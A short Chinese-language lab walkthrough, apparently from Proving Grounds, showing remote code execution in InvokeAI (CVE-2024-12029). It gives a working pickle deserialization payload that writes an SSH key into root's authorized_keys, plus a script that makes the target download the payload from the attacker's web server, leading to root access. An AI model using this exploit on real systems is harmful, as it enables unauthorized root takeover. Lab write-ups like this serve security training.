InvokeAI_RCE | PG Walkthrough
搜索“invokeai_rce”,你很快就能找到CVE-2024-12029。事实证明,“huntr”是新的AI/ML CVE网站。
huntr - 世界上第一个AI/ML漏洞赏金平台
世界上第一个AI/ML漏洞赏金平台
世界上第一个AI/ML漏洞赏金平台
huntr.com^
基本上按照此链接中的概念验证进行操作。解决此靶机的主要技巧是找到该链接。
靶机的描述建议创建一个密钥,并使用载荷将id_rsa.pub上传到root用户的authorized_keys文件中。
首先,使用以下命令创建密钥:
ssh-keygen
复制id_rsa.pub,并将其用于ssh.py中的载荷。
使用ssh.py,如上文链接中的PoC所示,生成载荷。
ckpt文件将把公钥回显到目标机器的root用户的authorized_keys文件中。
import pickleclass Payload:def __reduce__(self):import osreturn (os.system, ('echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA0mDlI9bbgZq0XYTKvG+jo/Q6/By7bxTP6VwRqs3sh1 root@kali" >> /root/.ssh/authorized_keys',))def generate_payload():# Not .pklwith open('payload.ckpt','wb') as f:pickle.dump(Payload(), f)generate_payload()
在payload.ckpt所在位置设置一个Web服务器,并在exploit.py中引用它以执行载荷(将攻击者的id_rsa.pub公钥粘贴到目标的root用户authorized_keys文件中)。
import requestsurl = "http://192.168.159.218:9090/api/v2/models/install"
params = {"source":"http://192.168.45.227:8080/payload.ckpt","inplace":"true"}
response = requests.post(url,params=params, json={})
print(response.text)
确保为id_rsa文件赋予必要的权限(chmod 600 id_rsa),然后使用通过ssh-keygen生成的id_rsa密钥以root用户身份进行SSH连接。
CSD0tFqvECLokhw9aBeRqlyK5KMpaklojJBUegXcB9J+/111yYeGSJSiNtXQwSVQ0pW+HI2mbOG2VnyH8b7ErlJ21+8esbpf+7cQT5JJbS3PF4agwWGfdflw3pgF9XrX
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
公众号二维码

公众号二维码
